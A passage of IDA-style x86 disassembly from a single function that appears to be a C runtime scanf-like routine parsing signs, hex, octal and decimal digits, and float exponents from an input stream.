loc_420370: ; CODE XREF: sub_41FBE0:loc_42035F�j
jmp short loc_420390
; ---------------------------------------------------------------------------
loc_420372: ; CODE XREF: sub_41FBE0+6AD�j
; sub_41FBE0+6DB�j
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_1D8]
push eax
call sub_421080
add esp, 8
jmp short loc_420395
; ---------------------------------------------------------------------------
loc_420390: ; CODE XREF: sub_41FBE0:loc_420370�j
jmp loc_42024E
; ---------------------------------------------------------------------------
loc_420395: ; CODE XREF: sub_41FBE0+685�j
; sub_41FBE0+7AE�j
mov ecx, [ebp+var_1E4]
cmp ecx, [ebp+var_3C]
jz short loc_4203D1
movsx edx, [ebp+var_70]
test edx, edx
jnz short loc_4203CF
mov eax, [ebp+var_34]
add eax, 1
mov [ebp+var_34], eax
cmp [ebp+var_C], 63h
jz short loc_4203CF
movsx ecx, [ebp+var_64]
test ecx, ecx
jz short loc_4203C9
mov edx, [ebp+var_3C]
mov word ptr [edx], 0
jmp short loc_4203CF
; ---------------------------------------------------------------------------
loc_4203C9: ; CODE XREF: sub_41FBE0+7DD�j
mov eax, [ebp+var_3C]
mov byte ptr [eax], 0
loc_4203CF: ; CODE XREF: sub_41FBE0+7C6�j
; sub_41FBE0+7D5�j ...
jmp short loc_4203D6
; ---------------------------------------------------------------------------
loc_4203D1: ; CODE XREF: sub_41FBE0+7BE�j
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_4203D6: ; CODE XREF: sub_41FBE0:loc_4203CF�j
jmp loc_420D74
; ---------------------------------------------------------------------------
loc_4203DB: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F82�o
mov [ebp+var_C], 64h
loc_4203E2: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F92�o
cmp [ebp+var_1D8], 2Dh
jnz short loc_4203F6
mov cl, [ebp+var_68]
add cl, 1
mov [ebp+var_68], cl
jmp short loc_4203FF
; ---------------------------------------------------------------------------
loc_4203F6: ; CODE XREF: sub_41FBE0+809�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_42043C
loc_4203FF: ; CODE XREF: sub_41FBE0+814�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jnz short loc_420421
cmp [ebp+var_1E8], 0
jz short loc_420421
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
jmp short loc_42043C
; ---------------------------------------------------------------------------
loc_420421: ; CODE XREF: sub_41FBE0+82C�j
; sub_41FBE0+835�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_42043C: ; CODE XREF: sub_41FBE0+81D�j
; sub_41FBE0+83F�j
cmp [ebp+var_1D8], 30h
jnz loc_4204DE
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
movsx edx, byte ptr [ebp+var_1D8]
cmp edx, 78h
jz short loc_42047C
movsx eax, byte ptr [ebp+var_1D8]
cmp eax, 58h
jnz short loc_4204A0
loc_42047C: ; CODE XREF: sub_41FBE0+88E�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
mov [ebp+var_C], 78h
jmp short loc_4204DE
; ---------------------------------------------------------------------------
loc_4204A0: ; CODE XREF: sub_41FBE0+89A�j
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
cmp [ebp+var_C], 78h
jz short loc_4204B8
mov [ebp+var_C], 6Fh
jmp short loc_4204DE
; ---------------------------------------------------------------------------
loc_4204B8: ; CODE XREF: sub_41FBE0+8CD�j
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_1D8]
push eax
call sub_421080
add esp, 8
mov [ebp+var_1D8], 30h
loc_4204DE: ; CODE XREF: sub_41FBE0+863�j
; sub_41FBE0+8BE�j ...
jmp short loc_42053E
; ---------------------------------------------------------------------------
loc_4204E0: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F8A�o
mov [ebp+var_38], 1
loc_4204E4: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F7A�o
cmp [ebp+var_1D8], 2Dh
jnz short loc_4204F8
mov cl, [ebp+var_68]
add cl, 1
mov [ebp+var_68], cl
jmp short loc_420501
; ---------------------------------------------------------------------------
loc_4204F8: ; CODE XREF: sub_41FBE0+90B�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_42053E
loc_420501: ; CODE XREF: sub_41FBE0+916�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jnz short loc_420523
cmp [ebp+var_1E8], 0
jz short loc_420523
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
jmp short loc_42053E
; ---------------------------------------------------------------------------
loc_420523: ; CODE XREF: sub_41FBE0+92E�j
; sub_41FBE0+937�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_42053E: ; CODE XREF: sub_41FBE0:loc_4204DE�j
; sub_41FBE0+91F�j ...
cmp [ebp+var_1DC], 0
jz loc_420739
loc_42054B: ; CODE XREF: sub_41FBE0:loc_420714�j
movsx eax, [ebp+var_18]
test eax, eax
jnz loc_420719
cmp [ebp+var_C], 78h
jnz loc_4205E6
cmp dword_442F58, 1
jle short loc_420586
push 80h
mov ecx, [ebp+var_1D8]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_208], eax
jmp short loc_4205A3
; ---------------------------------------------------------------------------
loc_420586: ; CODE XREF: sub_41FBE0+988�j
mov edx, [ebp+var_1D8]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 80h
mov [ebp+var_208], ecx
loc_4205A3: ; CODE XREF: sub_41FBE0+9A4�j
cmp [ebp+var_208], 0
jz short loc_4205D9
mov ecx, 4
mov eax, [ebp+var_30]
mov edx, [ebp+var_2C]
call sub_427900
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
mov edx, [ebp+var_1D8]
push edx
call sub_420FC0
add esp, 4
mov [ebp+var_1D8], eax
jmp short loc_4205E1
; ---------------------------------------------------------------------------
loc_4205D9: ; CODE XREF: sub_41FBE0+9CA�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_4205E1: ; CODE XREF: sub_41FBE0+9F7�j
jmp loc_42068D
; ---------------------------------------------------------------------------
loc_4205E6: ; CODE XREF: sub_41FBE0+97B�j
cmp dword_442F58, 1
jle short loc_420608
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_20C], eax
jmp short loc_420622
; ---------------------------------------------------------------------------
loc_420608: ; CODE XREF: sub_41FBE0+A0D�j
mov edx, [ebp+var_1D8]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_20C], ecx
loc_420622: ; CODE XREF: sub_41FBE0+A26�j
cmp [ebp+var_20C], 0
jz short loc_420685
cmp [ebp+var_C], 6Fh
jnz short loc_42065D
cmp [ebp+var_1D8], 38h
jge short loc_420652
mov ecx, 3
mov eax, [ebp+var_30]
mov edx, [ebp+var_2C]
call sub_427900
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
jmp short loc_42065B
; ---------------------------------------------------------------------------
loc_420652: ; CODE XREF: sub_41FBE0+A58�j
mov dl, [ebp+var_18]
add dl, 1
mov [ebp+var_18], dl
loc_42065B: ; CODE XREF: sub_41FBE0+A70�j
jmp short loc_420683
; ---------------------------------------------------------------------------
loc_42065D: ; CODE XREF: sub_41FBE0+A4F�j
mov ecx, 2
mov eax, [ebp+var_30]
mov edx, [ebp+var_2C]
call sub_427900
add eax, [ebp+var_30]
adc edx, [ebp+var_2C]
mov ecx, 1
call sub_427900
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
loc_420683: ; CODE XREF: sub_41FBE0:loc_42065B�j
jmp short loc_42068D
; ---------------------------------------------------------------------------
loc_420685: ; CODE XREF: sub_41FBE0+A49�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_42068D: ; CODE XREF: sub_41FBE0:loc_4205E1�j
; sub_41FBE0:loc_420683�j
movsx ecx, [ebp+var_18]
test ecx, ecx
jnz short loc_4206F8
mov edx, [ebp+var_6C]
add edx, 1
mov [ebp+var_6C], edx
mov eax, [ebp+var_1D8]
sub eax, 30h
cdq
mov ecx, [ebp+var_30]
add ecx, eax
mov eax, [ebp+var_2C]
adc eax, edx
mov [ebp+var_30], ecx
mov [ebp+var_2C], eax
cmp [ebp+var_1E8], 0
jz short loc_4206DB
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
cmp [ebp+var_1C], 0
jnz short loc_4206DB
mov dl, [ebp+var_18]
add dl, 1
mov [ebp+var_18], dl
jmp short loc_4206F6
; ---------------------------------------------------------------------------
loc_4206DB: ; CODE XREF: sub_41FBE0+ADF�j
; sub_41FBE0+AEE�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_4206F6: ; CODE XREF: sub_41FBE0+AF9�j
jmp short loc_420714
; ---------------------------------------------------------------------------
loc_4206F8: ; CODE XREF: sub_41FBE0+AB3�j
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_421080
add esp, 8
loc_420714: ; CODE XREF: sub_41FBE0:loc_4206F6�j
jmp loc_42054B
; ---------------------------------------------------------------------------
loc_420719: ; CODE XREF: sub_41FBE0+971�j
movsx edx, [ebp+var_68]
test edx, edx
jz short loc_420734
mov eax, [ebp+var_30]
neg eax
mov ecx, [ebp+var_2C]
adc ecx, 0
neg ecx
mov [ebp+var_30], eax
mov [ebp+var_2C], ecx
loc_420734: ; CODE XREF: sub_41FBE0+B3F�j
jmp loc_4208DD
; ---------------------------------------------------------------------------
loc_420739: ; CODE XREF: sub_41FBE0+965�j
; sub_41FBE0:loc_4208C8�j
movsx edx, [ebp+var_18]
test edx, edx
jnz loc_4208CD
cmp [ebp+var_C], 78h
jz short loc_420751
cmp [ebp+var_C], 70h
jnz short loc_4207C9
loc_420751: ; CODE XREF: sub_41FBE0+B69�j
cmp dword_442F58, 1
jle short loc_420776
push 80h
mov eax, [ebp+var_1D8]
push eax
call sub_41E750
add esp, 8
mov [ebp+var_210], eax
jmp short loc_420793
; ---------------------------------------------------------------------------
loc_420776: ; CODE XREF: sub_41FBE0+B78�j
mov ecx, [ebp+var_1D8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 80h
mov [ebp+var_210], eax
loc_420793: ; CODE XREF: sub_41FBE0+B94�j
cmp [ebp+var_210], 0
jz short loc_4207BC
mov ecx, [ebp+var_40]
shl ecx, 4
mov [ebp+var_40], ecx
mov edx, [ebp+var_1D8]
push edx
call sub_420FC0
add esp, 4
mov [ebp+var_1D8], eax
jmp short loc_4207C4
; ---------------------------------------------------------------------------
loc_4207BC: ; CODE XREF: sub_41FBE0+BBA�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_4207C4: ; CODE XREF: sub_41FBE0+BDA�j
jmp loc_42084B
; ---------------------------------------------------------------------------
loc_4207C9: ; CODE XREF: sub_41FBE0+B6F�j
cmp dword_442F58, 1
jle short loc_4207EB
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_214], eax
jmp short loc_420805
; ---------------------------------------------------------------------------
loc_4207EB: ; CODE XREF: sub_41FBE0+BF0�j
mov edx, [ebp+var_1D8]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_214], ecx
loc_420805: ; CODE XREF: sub_41FBE0+C09�j
cmp [ebp+var_214], 0
jz short loc_420842
cmp [ebp+var_C], 6Fh
jnz short loc_420832
cmp [ebp+var_1D8], 38h
jge short loc_420828
mov edx, [ebp+var_40]
shl edx, 3
mov [ebp+var_40], edx
jmp short loc_420830
; ---------------------------------------------------------------------------
loc_420828: ; CODE XREF: sub_41FBE0+C3B�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_420830: ; CODE XREF: sub_41FBE0+C46�j
jmp short loc_420840
; ---------------------------------------------------------------------------
loc_420832: ; CODE XREF: sub_41FBE0+C32�j
mov ecx, [ebp+var_40]
mov edx, [ebp+var_40]
lea eax, [edx+ecx*4]
shl eax, 1
mov [ebp+var_40], eax
loc_420840: ; CODE XREF: sub_41FBE0:loc_420830�j
jmp short loc_42084B
; ---------------------------------------------------------------------------
loc_420842: ; CODE XREF: sub_41FBE0+C2C�j
mov cl, [ebp+var_18]
add cl, 1
mov [ebp+var_18], cl
loc_42084B: ; CODE XREF: sub_41FBE0:loc_4207C4�j
; sub_41FBE0:loc_420840�j
movsx edx, [ebp+var_18]
test edx, edx
jnz short loc_4208AC
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
mov ecx, [ebp+var_1D8]
mov edx, [ebp+var_40]
lea eax, [edx+ecx-30h]
mov [ebp+var_40], eax
cmp [ebp+var_1E8], 0
jz short loc_42088F
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
cmp [ebp+var_1C], 0
jnz short loc_42088F
mov dl, [ebp+var_18]
add dl, 1
mov [ebp+var_18], dl
jmp short loc_4208AA
; ---------------------------------------------------------------------------
loc_42088F: ; CODE XREF: sub_41FBE0+C93�j
; sub_41FBE0+CA2�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_4208AA: ; CODE XREF: sub_41FBE0+CAD�j
jmp short loc_4208C8
; ---------------------------------------------------------------------------
loc_4208AC: ; CODE XREF: sub_41FBE0+C71�j
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_421080
add esp, 8
loc_4208C8: ; CODE XREF: sub_41FBE0:loc_4208AA�j
jmp loc_420739
; ---------------------------------------------------------------------------
loc_4208CD: ; CODE XREF: sub_41FBE0+B5F�j
movsx edx, [ebp+var_68]
test edx, edx
jz short loc_4208DD
mov eax, [ebp+var_40]
neg eax
mov [ebp+var_40], eax
loc_4208DD: ; CODE XREF: sub_41FBE0:loc_420734�j
; sub_41FBE0+CF3�j
cmp [ebp+var_C], 46h
jnz short loc_4208EA
mov [ebp+var_6C], 0
loc_4208EA: ; CODE XREF: sub_41FBE0+D01�j
cmp [ebp+var_6C], 0
jz short loc_420938
movsx ecx, [ebp+var_70]
test ecx, ecx
jnz short loc_420936
mov edx, [ebp+var_34]
add edx, 1
mov [ebp+var_34], edx
loc_420901: ; CODE XREF: sub_41FBE0+D70�j
cmp [ebp+var_1DC], 0
jz short loc_42091A
mov eax, [ebp+var_3C]
mov ecx, [ebp+var_30]
mov [eax], ecx
mov edx, [ebp+var_2C]
mov [eax+4], edx
jmp short loc_420936
; ---------------------------------------------------------------------------
loc_42091A: ; CODE XREF: sub_41FBE0+D28�j
movsx eax, [ebp+var_38]
test eax, eax
jz short loc_42092C
mov ecx, [ebp+var_3C]
mov edx, [ebp+var_40]
mov [ecx], edx
jmp short loc_420936
; ---------------------------------------------------------------------------
loc_42092C: ; CODE XREF: sub_41FBE0+D40�j
mov eax, [ebp+var_3C]
mov cx, word ptr [ebp+var_40]
mov [eax], cx
loc_420936: ; CODE XREF: sub_41FBE0+D16�j
; sub_41FBE0+D38�j ...
jmp short loc_42093D
; ---------------------------------------------------------------------------
loc_420938: ; CODE XREF: sub_41FBE0+D0E�j
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_42093D: ; CODE XREF: sub_41FBE0:loc_420936�j
jmp loc_420D74
; ---------------------------------------------------------------------------
loc_420942: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F86�o
mov edx, [ebp+var_20]
mov [ebp+var_40], edx
movsx eax, [ebp+var_70]
test eax, eax
jnz short loc_420952
jmp short loc_420901
; ---------------------------------------------------------------------------
loc_420952: ; CODE XREF: sub_41FBE0+D6E�j
jmp loc_420D74
; ---------------------------------------------------------------------------
loc_420957: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F7E�o
lea ecx, [ebp+var_1D0]
mov [ebp+var_1E0], ecx
cmp [ebp+var_1D8], 2Dh
jnz short loc_420986
mov edx, [ebp+var_1E0]
mov byte ptr [edx], 2Dh
mov eax, [ebp+var_1E0]
add eax, 1
mov [ebp+var_1E0], eax
jmp short loc_42098F
; ---------------------------------------------------------------------------
loc_420986: ; CODE XREF: sub_41FBE0+D8A�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_4209B3
loc_42098F: ; CODE XREF: sub_41FBE0+DA4�j
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_4209B3: ; CODE XREF: sub_41FBE0+DAD�j
cmp [ebp+var_1E8], 0
jz short loc_4209C5
cmp [ebp+var_1C], 15Dh
jle short loc_4209CC
loc_4209C5: ; CODE XREF: sub_41FBE0+DDA�j
mov [ebp+var_1C], 15Dh
loc_4209CC: ; CODE XREF: sub_41FBE0+DE3�j
; sub_41FBE0+E82�j
cmp dword_442F58, 1
jle short loc_4209EE
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_218], eax
jmp short loc_420A08
; ---------------------------------------------------------------------------
loc_4209EE: ; CODE XREF: sub_41FBE0+DF3�j
mov edx, [ebp+var_1D8]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_218], ecx
loc_420A08: ; CODE XREF: sub_41FBE0+E0C�j
cmp [ebp+var_218], 0
jz short loc_420A67
mov edx, [ebp+var_1C]
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
test edx, edx
jz short loc_420A67
mov ecx, [ebp+var_6C]
add ecx, 1
mov [ebp+var_6C], ecx
mov edx, [ebp+var_1E0]
mov al, byte ptr [ebp+var_1D8]
mov [edx], al
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
jmp loc_4209CC
; ---------------------------------------------------------------------------
loc_420A67: ; CODE XREF: sub_41FBE0+E2F�j
; sub_41FBE0+E3F�j
movsx ecx, byte_442F5C
movsx edx, byte ptr [ebp+var_1D8]
cmp ecx, edx
jnz loc_420B64
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jz loc_420B64
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
mov ecx, [ebp+var_1E0]
mov dl, byte_442F5C
mov [ecx], dl
mov eax, [ebp+var_1E0]
add eax, 1
mov [ebp+var_1E0], eax
loc_420AC9: ; CODE XREF: sub_41FBE0+F7F�j
cmp dword_442F58, 1
jle short loc_420AEB
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_21C], eax
jmp short loc_420B05
; ---------------------------------------------------------------------------
loc_420AEB: ; CODE XREF: sub_41FBE0+EF0�j
mov edx, [ebp+var_1D8]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_21C], ecx
loc_420B05: ; CODE XREF: sub_41FBE0+F09�j
cmp [ebp+var_21C], 0
jz short loc_420B64
mov edx, [ebp+var_1C]
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
test edx, edx
jz short loc_420B64
mov ecx, [ebp+var_6C]
add ecx, 1
mov [ebp+var_6C], ecx
mov edx, [ebp+var_1E0]
mov al, byte ptr [ebp+var_1D8]
mov [edx], al
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
jmp loc_420AC9
; ---------------------------------------------------------------------------
loc_420B64: ; CODE XREF: sub_41FBE0+E97�j
; sub_41FBE0+EAB�j ...
cmp [ebp+var_6C], 0
jz loc_420CC9
cmp [ebp+var_1D8], 65h
jz short loc_420B84
cmp [ebp+var_1D8], 45h
jnz loc_420CC9
loc_420B84: ; CODE XREF: sub_41FBE0+F95�j
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
test ecx, ecx
jz loc_420CC9
mov eax, [ebp+var_1E0]
mov byte ptr [eax], 65h
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 2Dh
jnz short loc_420BEE
mov ecx, [ebp+var_1E0]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
jmp short loc_420BF7
; ---------------------------------------------------------------------------
loc_420BEE: ; CODE XREF: sub_41FBE0+FF2�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_420C2D
loc_420BF7: ; CODE XREF: sub_41FBE0+100C�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jnz short loc_420C12
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
jmp short loc_420C2D
; ---------------------------------------------------------------------------
loc_420C12: ; CODE XREF: sub_41FBE0+1025�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_420C2D: ; CODE XREF: sub_41FBE0+1015�j
; sub_41FBE0+1030�j ...
cmp dword_442F58, 1
jle short loc_420C4F
push 4
mov edx, [ebp+var_1D8]
push edx
call sub_41E750
add esp, 8
mov [ebp+var_220], eax
jmp short loc_420C6A
; ---------------------------------------------------------------------------
loc_420C4F: ; CODE XREF: sub_41FBE0+1054�j
mov eax, [ebp+var_1D8]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_220], edx
loc_420C6A: ; CODE XREF: sub_41FBE0+106D�j
cmp [ebp+var_220], 0
jz short loc_420CC9
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jz short loc_420CC9
mov edx, [ebp+var_6C]
add edx, 1
mov [ebp+var_6C], edx
mov eax, [ebp+var_1E0]
mov cl, byte ptr [ebp+var_1D8]
mov [eax], cl
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
jmp loc_420C2D
; ---------------------------------------------------------------------------
loc_420CC9: ; CODE XREF: sub_41FBE0+F88�j
; sub_41FBE0+F9E�j ...
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_421080
add esp, 8
cmp [ebp+var_6C], 0
jz short loc_420D23
movsx edx, [ebp+var_70]
test edx, edx
jnz short loc_420D21
mov eax, [ebp+var_34]
add eax, 1
mov [ebp+var_34], eax
mov ecx, [ebp+var_1E0]
mov byte ptr [ecx], 0
lea edx, [ebp+var_1D0]
push edx
mov eax, [ebp+var_3C]
push eax
movsx ecx, [ebp+var_38]
sub ecx, 1
push ecx
call off_443208
add esp, 0Ch
loc_420D21: ; CODE XREF: sub_41FBE0+1111�j
jmp short loc_420D28
; ---------------------------------------------------------------------------
loc_420D23: ; CODE XREF: sub_41FBE0+1109�j
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_420D28: ; CODE XREF: sub_41FBE0:loc_420D21�j
jmp short loc_420D74
; ---------------------------------------------------------------------------
loc_420D2A: ; CODE XREF: sub_41FBE0+3B0�j
; sub_41FBE0+3C4�j
; DATA XREF: ...
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
cmp eax, [ebp+var_1D8]
jz short loc_420D5A
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_1D8]
push eax
call sub_421080
add esp, 8
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_420D5A: ; CODE XREF: sub_41FBE0+1157�j
mov cl, [ebp+var_28]
sub cl, 1
mov [ebp+var_28], cl
movsx edx, [ebp+var_70]
test edx, edx
jnz short loc_420D74
mov eax, [ebp+var_1D4]
mov [ebp+arg_8], eax
loc_420D74: ; CODE XREF: sub_41FBE0:loc_4203D6�j
; sub_41FBE0:loc_42093D�j ...
mov cl, [ebp+var_28]
add cl, 1
mov [ebp+var_28], cl
jmp short loc_420DA0
; ---------------------------------------------------------------------------
loc_420D7F: ; CODE XREF: sub_41FBE0+38B�j
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_421080
add esp, 8
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_420DA0: ; CODE XREF: sub_41FBE0+119D�j
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
jmp loc_420EA1
; ---------------------------------------------------------------------------
loc_420DAE: ; CODE XREF: sub_41FBE0+11D�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov esi, edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
mov ecx, [ebp+var_1D8]
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
cmp esi, ecx
jz short loc_420E06
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1D8]
push edx
call sub_421080
add esp, 8
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_420E06: ; CODE XREF: sub_41FBE0+1203�j
mov eax, [ebp+var_1D8]
and eax, 0FFh
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_420EA1
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov esi, edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1F4], eax
mov ecx, [ebp+var_1F4]
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
cmp esi, ecx
jz short loc_420E98
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1F4]
push edx
call sub_421080
add esp, 8
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1D8]
push edx
call sub_421080
add esp, 8
jmp short loc_420ECA
; ---------------------------------------------------------------------------
loc_420E98: ; CODE XREF: sub_41FBE0+127C�j
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
loc_420EA1: ; CODE XREF: sub_41FBE0+11C9�j
; sub_41FBE0+1245�j
cmp [ebp+var_1D8], 0FFFFFFFFh
jnz short loc_420EC5
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 25h
jnz short loc_420EC3
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+1]
cmp ecx, 6Eh
jz short loc_420EC5
loc_420EC3: ; CODE XREF: sub_41FBE0+12D4�j
jmp short loc_420ECA
; ---------------------------------------------------------------------------
loc_420EC5: ; CODE XREF: sub_41FBE0+12C8�j
; sub_41FBE0+12E1�j
jmp loc_41FC57
; ---------------------------------------------------------------------------
loc_420ECA: ; CODE XREF: sub_41FBE0+80�j
; sub_41FBE0+635�j ...
cmp [ebp+var_1D8], 0FFFFFFFFh
jnz short loc_420EFE
cmp [ebp+var_34], 0
jnz short loc_420EED
movsx edx, [ebp+var_28]
test edx, edx
jnz short loc_420EED
mov [ebp+var_224], 0FFFFFFFFh
